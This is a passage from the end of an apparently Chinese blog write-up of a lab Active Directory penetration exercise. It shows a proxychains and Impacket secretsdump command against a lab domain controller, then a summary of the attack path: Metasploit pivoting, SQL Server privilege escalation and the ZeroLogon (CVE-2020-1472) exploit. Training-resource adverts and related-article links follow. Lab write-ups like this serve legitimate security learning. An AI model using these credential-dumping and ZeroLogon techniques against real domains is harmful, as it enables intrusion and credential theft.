proxychains4 python3 secretsdump.py redteam.red/owa\$@10.10.10.8    -no-pass``[proxychains] config file found: /etc/proxychains4.conf``[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4``[proxychains] DLL init: proxychains-ng 4.17``Impacket v0.11.0 - Copyright 2023 Fortra``   ``[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:445 <--socket error or timeout!``[-] RemoteOperations failed: [Errno Connection error (10.10.10.8:445)] [Errno 111] Connection refused``[*] Cleaning up...``

失败了,说明恢复成功了

至此拿下整个靶场

04

**—
**

靶场总结

外网和内网前面部分大致路线与上一期相同,这一次主要用的MSF进行上线、代理等操作,在域渗透部分与上一期相比使用了不同的手法:查看到SQLSERVER-2008的系统信息后去网络上搜集对应版本的提权漏洞,然后尝试提权;在拿域控权限的时候使用的是CVE-2020-1472 ZeroLogon这个漏洞,该漏洞会将域控机器账号密码置空,利用完之后为了减小对环境的影响,需要恢复原来的密码。对于有多层内网的环境,个人感觉使用MSF的socks代理相比CS和其他代理工具要方便一些

为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]


在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]
在这里插入图片描述

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]

Python_chichi
关注
专栏目录
【精选】ATK&CK红队评估实战靶场一 超详细过程思路
人若无名,便可专心练剑
11-30 499
"护网行动"通常指的是针对网络安全和信息安全的行动。这种行动可能是由政府、组织或社区发起的,旨在保护网络系统和数据免受未经授权的访问、损坏或窃取。这些行动可能涉及加强网络防御、加强密码管理、加强安全意识培训以及制定相关法律法规。实施护网行动是确保网络安全的重要举措,以应对不断增长的网络威胁和攻击
2024年最新Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
2401_84297265的博客
05-03 1670
内网靶场渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 1590
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
Vulnstack红日安全内网渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
2024年网安最全Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84252281的博客
05-03 1821
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 934
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。
ATT&CK实战系列-Vulnstack三层网络渗透靶场(一)
M372109150的博客
09-22 1303
本篇为红日安全的ATT&CK实战系列-红队评估 (一)Vulnstack三层网络渗透靶场靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
内网渗透靶场 Vulnstack(二)
qq_47168481的博客
03-08 5810
这次靶场东拼西凑也算是通关了,重新复习了一下,也学到了很多东西,在这简单梳理一下思路 内网环境介绍 控服务器: •内网IP:10.10.10.10 •系统:Windows Server 2012(64位) •用户名:de1ay WEB服务器: •模拟外网IP:192.168.178.153 •内网IP:10.10.10.80 •系统:Windows Server 2008(64位) PC内主机: •内网IP:10.10.10.201 •系统:Windows 7(32位) 攻击者VPS: •模拟外网IP
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够
zzz6583zz的博客
06-15 731
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(AdvancedPersistentThreat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
内网渗透攻击线路图.pdf
03-21
内网渗透攻击线路图.pdf
2024HVV 红队最常用的三大工具(非常详细)零基础入门精通收藏一篇就够了_红队工具集合2024(1)
2303_79055785的博客
04-20 496
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 774
一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1211
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 754
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
weixin_64446270的博客
09-27 1459
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
安全服务面试
m0_74402888的博客
09-28 645
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 829
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
等保测评:企业数字安全的坚实盾牌
最新发布
w13359990065的博客
09-30 1687
据权威机构统计,未通过等保测评的企业在遭遇网络安全事件时,其数据泄露风险高出已通过企业近30%,这不仅直接威胁到企业的核心资产安全,还可能导致品牌信誉的严重受损。以某知名电商企业为例,因忽视等保测评,其支付系统曾遭受黑客攻击,导致大量用户信息泄露,最终不仅面临巨额罚款,还失去了大量客户的信任,市场份额一落千丈。以某知名电商企业为例,其在一次等保测评中发现,其支付系统存在一处严重的SQL注入漏洞,该漏洞允许攻击者通过构造特定的输入参数,绕过系统验证,直接访问数据库,进而获取敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值